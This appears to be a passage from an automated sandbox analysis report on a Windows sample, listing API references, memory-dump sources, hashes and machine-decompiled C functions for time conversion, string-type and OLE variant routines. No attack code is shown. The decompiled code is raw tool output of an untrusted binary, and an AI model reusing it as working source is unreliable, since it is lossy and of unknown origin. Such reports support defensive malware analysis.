                                                                              0x00410281
                                                                              0x00410285
                                                                              0x0041028a
                                                                              0x00000000
                                                                              0x00410144
                                                                              0x00410144
                                                                              0x00410144
                                                                              0x00410145
                                                                              0x00410209
                                                                              0x0041020f
                                                                              0x00410222
                                                                              0x00410226
                                                                              0x0041022b
                                                                              0x00000000
                                                                              0x0041014b
                                                                              0x0041014b
                                                                              0x0041014b
                                                                              0x0041014c
                                                                              0x004101d0
                                                                              0x004101d6
                                                                              0x004101e9
                                                                              0x004101ed
                                                                              0x004101f2
                                                                              0x00000000
                                                                              0x0041014e
                                                                              0x0041014e
                                                                              0x0041014e
                                                                              0x0041014f
                                                                              0x00410196
                                                                              0x004101a0
                                                                              0x004101a6
                                                                              0x004101a9
                                                                              0x004101b3
                                                                              0x004101b7
                                                                              0x004101bc
                                                                              0x00000000
                                                                              0x00410151
                                                                              0x00410151
                                                                              0x00410152
                                                                              0x00410164
                                                                              0x0041016a
                                                                              0x0041017d
                                                                              0x00410181
                                                                              0x00410186
                                                                              0x00410428
                                                                              0x00410429
                                                                              0x0041042c
                                                                              0x0041042c
                                                                              0x00410152
                                                                              0x0041014f
                                                                              0x0041014c
                                                                              0x00410145
                                                                              0x0041013e
                                                                              0x00410137
                                                                              0x0041012f
                                                                              0x00410129
                                                                              0x00410120
                                                                              0x00410598
                                                                              0x004105a1
                                                                              0x004105a1
                                                                              0x004105ab
                                                                              0x004105bc

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0041009C
                                                                              • VariantClear.OLEAUT32(?), ref: 004100FE
                                                                              • VariantClear.OLEAUT32(00000007), ref: 0041042C
                                                                              • VariantClear.OLEAUT32(?), ref: 004105A1
                                                                                • Part of subcall function 00411612: VariantCopy.OLEAUT32(?,?), ref: 0041161A
                                                                                • Part of subcall function 0040C8D0: SystemTimeToVariantTime.OLEAUT32(?), ref: 0040C91E
                                                                              • VariantClear.OLEAUT32(?), ref: 00410581
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                              • String ID:
                                                                              • API String ID: 2075586698-0
                                                                              • Opcode ID: 605e1c9f83e75445cd3245e7be9d30b8c5f4e15b5cd69c8d251bbf80b7a2f1e9
                                                                              • Instruction ID: 296da0157ccbdd0a806008ceeefc9c7c9cc0745809533a2ac8276533d41b2ddb
                                                                              • Opcode Fuzzy Hash: 605e1c9f83e75445cd3245e7be9d30b8c5f4e15b5cd69c8d251bbf80b7a2f1e9
                                                                              • Instruction Fuzzy Hash: ADE15E7190011CEACF15EB94C894AFEB779BF48304F04409FF946B7291DB789A89DB29
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004144DC, Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E004144DC(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E0041AB3B(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E0041A32F(_t121);
							__eflags =  *0x4578ac; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x4578a8; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E0041ABD0(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E00414150(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E0041ABD0(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E00414150(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E0041ABD0(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E00414150(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E0041AB87(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x4578b0; // 0xfffff1f0
							_t86 =  *0x4578a8; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x4578a8; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E0041A32F( &_v12);
							_t138 =  *0x4578ac; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E0041AB87(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x4578b0; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E0041A32F( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}







































                                                                              0x004144dc
                                                                              0x004144e3
                                                                              0x004144e6
                                                                              0x004144e9
                                                                              0x004144ed
                                                                              0x004144ef
                                                                              0x004146e4
                                                                              0x004146e4
                                                                              0x004146e4
                                                                              0x00000000
                                                                              0x004144ff
                                                                              0x004144ff
                                                                              0x00414505
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041450b
                                                                              0x00414515
                                                                              0x00414515
                                                                              0x00414516
                                                                              0x0041451b
                                                                              0x0041451e
                                                                              0x00414520
                                                                              0x00414522
                                                                              0x0041458a
                                                                              0x0041458f
                                                                              0x00414596
                                                                              0x00414598
                                                                              0x004145d3
                                                                              0x004145d5
                                                                              0x004145d8
                                                                              0x004145dd
                                                                              0x004145df
                                                                              0x004145e0
                                                                              0x004145e0
                                                                              0x004145e2
                                                                              0x004145e4
                                                                              0x004145e7
                                                                              0x004145ea
                                                                              0x004145ef
                                                                              0x004145f4
                                                                              0x004145f6
                                                                              0x004145f8
                                                                              0x004145fd
                                                                              0x004145ff
                                                                              0x00414603
                                                                              0x00414603
                                                                              0x00414610
                                                                              0x0041461c
                                                                              0x00414620
                                                                              0x00414626
                                                                              0x00414629
                                                                              0x0041462c
                                                                              0x00414631
                                                                              0x00414633
                                                                              0x00414636
                                                                              0x0041463b
                                                                              0x0041463e
                                                                              0x00414642
                                                                              0x00414642
                                                                              0x0041464f
                                                                              0x0041465b
                                                                              0x0041465f
                                                                              0x00414665
                                                                              0x00414668
                                                                              0x0041466b
                                                                              0x00414670
                                                                              0x00414672
                                                                              0x00414675
                                                                              0x0041467a
                                                                              0x0041467d
                                                                              0x00414681
                                                                              0x00414681
                                                                              0x0041468e
                                                                              0x00414693
                                                                              0x00414695
                                                                              0x00414698
                                                                              0x0041469b
                                                                              0x00000000
                                                                              0x0041469d
                                                                              0x0041469d
                                                                              0x004146a3
                                                                              0x004146aa
                                                                              0x004146ad
                                                                              0x004146b0
                                                                              0x004146b6
                                                                              0x004146b9
                                                                              0x004146bc
                                                                              0x004146be
                                                                              0x004146dc
                                                                              0x004146dc
                                                                              0x004146dc
                                                                              0x004146c0
                                                                              0x004146c3
                                                                              0x004146c6
                                                                              0x004146c9
                                                                              0x004146d0
                                                                              0x004146d0
                                                                              0x00000000
                                                                              0x004146be
                                                                              0x0041469f
                                                                              0x004146a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004146a1
                                                                              0x0041469b
                                                                              0x0041459a
                                                                              0x0041459b
                                                                              0x004145a0
                                                                              0x004145a3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004145a5
                                                                              0x004145ab
                                                                              0x004145b2
                                                                              0x004145b9
                                                                              0x004145bc
                                                                              0x004145be
                                                                              0x004145c1
                                                                              0x004145c4
                                                                              0x004145cb
                                                                              0x004145ce
                                                                              0x00000000
                                                                              0x0041452e
                                                                              0x0041452e
                                                                              0x00414533
                                                                              0x00414539
                                                                              0x0041453c
                                                                              0x0041453f
                                                                              0x00414542
                                                                              0x00414547
                                                                              0x0041454e
                                                                              0x00414550
                                                                              0x00414556
                                                                              0x0041455f
                                                                              0x00414565
                                                                              0x0041456a
                                                                              0x0041456b
                                                                              0x00414572
                                                                              0x0041457a
                                                                              0x0041457d
                                                                              0x0041457d
                                                                              0x0041455f
                                                                              0x004146df
                                                                              0x004146df
                                                                              0x004146e6
                                                                              0x004146e9
                                                                              0x004146e9
                                                                              0x00414522
                                                                              0x0041450d
                                                                              0x0041450f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041450f

                                                                              APIs
                                                                                • Part of subcall function 0041A32F: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A3A1
                                                                              • __allrem.LIBCMT ref: 004145EF
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414610
                                                                              • __allrem.LIBCMT ref: 0041462C
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041464F
                                                                              • __allrem.LIBCMT ref: 0041466B
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041468E
                                                                                • Part of subcall function 0041AB87: __lock.LIBCMT ref: 0041AB95
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                              • String ID:
                                                                              • API String ID: 1282128132-0
                                                                              • Opcode ID: f24aae5e9ac02b481025052f879efbc357ef8583a21a8847699c1fccd395c587
                                                                              • Instruction ID: 06791d17e37df409e4ad410069e7d1675949318fa0081310cd0c641f4bbc42b9
                                                                              • Opcode Fuzzy Hash: f24aae5e9ac02b481025052f879efbc357ef8583a21a8847699c1fccd395c587
                                                                              • Instruction Fuzzy Hash: 3B61B171A00604AFDB24DF69D8809DEB7F5EF84328B24853FE155E3291D7389E95CB09
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419914, Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E00419914(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x44c670);
				E00412BA4(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x45a74c - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x44bd1c, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x45a74c = 2;
						}
					} else {
						 *0x45a74c = 1;
					}
				}
				_t42 =  *0x45a74c; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x45a730; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x45a740; // 0x0
					}
					_t43 = E0041AED4(_t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(_t83 != 0) {
								_push(_t83);
								E00412A4D();
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E0041AF17(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E00412BDF(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x45a740; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E00412260(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E00412140(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E00412A4D();
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E004146EA(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}



















                                                                              0x00419914
                                                                              0x00419914
                                                                              0x00419916
                                                                              0x0041991b
                                                                              0x00419920
                                                                              0x00419922
                                                                              0x00419928
                                                                              0x00419940
                                                                              0x0041994a
                                                                              0x00419950
                                                                              0x00419953
                                                                              0x00419955
                                                                              0x00419955
                                                                              0x00419942
                                                                              0x00419942
                                                                              0x00419942
                                                                              0x00419940
                                                                              0x0041995f
                                                                              0x00419967
                                                                              0x00419a57
                                                                              0x00419a5a
                                                                              0x00419a5c
                                                                              0x00419a5e
                                                                              0x00419a5e
                                                                              0x00419a64
                                                                              0x00419a67
                                                                              0x00419a69
                                                                              0x00419a6b
                                                                              0x00419a6b
                                                                              0x00419a72
                                                                              0x00419a78
                                                                              0x00419a7b
                                                                              0x00419a81
                                                                              0x00419a83
                                                                              0x00419aa3
                                                                              0x00419ab6
                                                                              0x00419ab8
                                                                              0x00419aba
                                                                              0x00419abc
                                                                              0x00419abd
                                                                              0x00419ac2
                                                                              0x00419ac3
                                                                              0x00000000
                                                                              0x00419ac3
                                                                              0x00419a85
                                                                              0x00419a87
                                                                              0x00419a8c
                                                                              0x00419a8d
                                                                              0x00419a90
                                                                              0x00419a91
                                                                              0x00419a9a
                                                                              0x00419a9c
                                                                              0x00419a9e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419aa0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419975
                                                                              0x00419978
                                                                              0x00419a7d
                                                                              0x00419a7d
                                                                              0x00419ac5
                                                                              0x00419acd
                                                                              0x00419acd
                                                                              0x0041997e
                                                                              0x00419981
                                                                              0x00419987
                                                                              0x00419989
                                                                              0x0041998e
                                                                              0x0041998e
                                                                              0x004199b2
                                                                              0x004199b4
                                                                              0x004199b9
                                                                              0x00000000
                                                                              0x004199bf
                                                                              0x004199bf
                                                                              0x004199c3
                                                                              0x004199ce
                                                                              0x004199d3
                                                                              0x004199d6
                                                                              0x004199d8
                                                                              0x004199df
                                                                              0x004199e7
                                                                              0x00419a02
                                                                              0x00419a04
                                                                              0x00419a1d
                                                                              0x00419a2a
                                                                              0x00419a32
                                                                              0x00419a42
                                                                              0x00419a42
                                                                              0x00419a49
                                                                              0x00419a4b
                                                                              0x00419a4c
                                                                              0x00419a51
                                                                              0x00419a52
                                                                              0x00000000
                                                                              0x00419a06
                                                                              0x00419a06
                                                                              0x00419a07
                                                                              0x00419a10
                                                                              0x00419a14
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419a16
                                                                              0x00000000
                                                                              0x00419a16
                                                                              0x00419a04
                                                                              0x004199b9

                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(00000001,0044BD1C,00000001,?,0044C670,0000001C,004135F2,00000001,00000020,00000100,?,00000000), ref: 00419938
                                                                              • GetLastError.KERNEL32 ref: 0041994A
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000000,004138C3,00000000,00000000,0044C670,0000001C,004135F2,00000001,00000020,00000100,?,00000000), ref: 004199AC
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004138C3,?,00000000), ref: 00419A2A
                                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00419A3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 3581945363-0
                                                                              • Opcode ID: 34c54c4d83cc0e6e6419d8d521f45a16043b779db807584da7b052a505759e70
                                                                              • Instruction ID: 97e70e5a9afb8e25a7a1206e643ab233fd1233c46a0855ec883214398f933a41
                                                                              • Opcode Fuzzy Hash: 34c54c4d83cc0e6e6419d8d521f45a16043b779db807584da7b052a505759e70
                                                                              • Instruction Fuzzy Hash: 6B41D072900355ABCF218F50DC46AEF3B75FF487A0F14411AF814A6291C779CDA4CBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004105BF, Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 41%
                                                                              			E004105BF(void* __ecx, void* __edx) {
				signed int _t73;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t129;

				_t117 = __edx;
				E004128A0(E004312F2, _t126);
				_t129 = _t128 - 0x6c;
				_t73 = 0;
				_t124 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t126 - 0x10) = 0;
				 *(_t126 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
					return 0;
				}
				do {
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
					if(_t109 == 0) {
						goto L19;
					}
					_t110 =  *((intOrPtr*)(_t109 + 4));
					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
					if(_t110 == 0) {
						goto L19;
					}
					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
					do {
						_t122 =  *((intOrPtr*)(E00409D70(_t126 - 0x20)));
						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
						E00412140(_t126 - 0x78, 0, 0x20);
						_t129 = _t129 + 0xc;
						E0041162C(_t126 - 0x48);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t124 + 0x48));
						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
							__eflags = _t85;
						} else {
							_t99 = E00410097(_t124, _t117, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
							 *(_t126 - 4) = 1;
							E00411612(_t99, _t126 - 0x48, _t99);
							 *(_t126 - 4) = 0;
							__imp__#9(_t126 - 0x58);
							_t85 = _t126 - 0x48;
						}
						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
						 *((intOrPtr*)(_t126 - 0x30)) = 1;
						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
						 *(_t122 + 0x84) = 1;
						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
						if(_t89 != 0) {
							_t117 = _t126 - 0x1c;
							_push(_t126 - 0x1c);
							_push(0x44dd5c);
							_push(_t89);
							if( *((intOrPtr*)( *_t89))() >= 0) {
								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
								_t117 = _t126 - 0x38;
								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x44ddcc, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
								}
								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
								}
								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
								}
								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
							}
						}
						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
						__imp__#9(_t126 - 0x48);
					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
					_t73 =  *(_t126 - 0x18);
					L19:
					_t73 = _t73 + 1;
					 *(_t126 - 0x18) = _t73;
				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
				goto L21;
			}
















                                                                              0x004105bf
                                                                              0x004105c4
                                                                              0x004105c9
                                                                              0x004105cc
                                                                              0x004105cf
                                                                              0x004105d4
                                                                              0x004105db
                                                                              0x004105de
                                                                              0x004105e1
                                                                              0x0041074c
                                                                              0x0041074c
                                                                              0x00410756
                                                                              0x0041075e
                                                                              0x0041075e
                                                                              0x004105e9
                                                                              0x004105f2
                                                                              0x004105f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004105fe
                                                                              0x00410603
                                                                              0x00410606
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00410612
                                                                              0x00410615
                                                                              0x00410625
                                                                              0x0041062f
                                                                              0x00410636
                                                                              0x0041063b
                                                                              0x00410642
                                                                              0x00410647
                                                                              0x0041064b
                                                                              0x0041064f
                                                                              0x00410684
                                                                              0x00410684
                                                                              0x00410651
                                                                              0x0041065c
                                                                              0x00410665
                                                                              0x00410669
                                                                              0x00410672
                                                                              0x00410676
                                                                              0x0041067c
                                                                              0x0041067c
                                                                              0x00410687
                                                                              0x0041068d
                                                                              0x00410693
                                                                              0x00410696
                                                                              0x00410699
                                                                              0x0041069f
                                                                              0x004106a4
                                                                              0x004106a8
                                                                              0x004106ab
                                                                              0x004106ac
                                                                              0x004106b1
                                                                              0x004106b6
                                                                              0x004106b8
                                                                              0x004106c7
                                                                              0x004106db
                                                                              0x004106de
                                                                              0x004106e4
                                                                              0x004106e7
                                                                              0x004106f2
                                                                              0x004106f7
                                                                              0x004106f7
                                                                              0x00410701
                                                                              0x00410706
                                                                              0x00410706
                                                                              0x00410710
                                                                              0x00410715
                                                                              0x00410715
                                                                              0x0041071b
                                                                              0x0041071e
                                                                              0x0041071e
                                                                              0x004106b6
                                                                              0x00410722
                                                                              0x0041072a
                                                                              0x00410730
                                                                              0x0041073a
                                                                              0x0041073d
                                                                              0x0041073d
                                                                              0x00410741
                                                                              0x00410741
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004105C4
                                                                              • VariantClear.OLEAUT32(?), ref: 00410676
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004106F7
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00410706
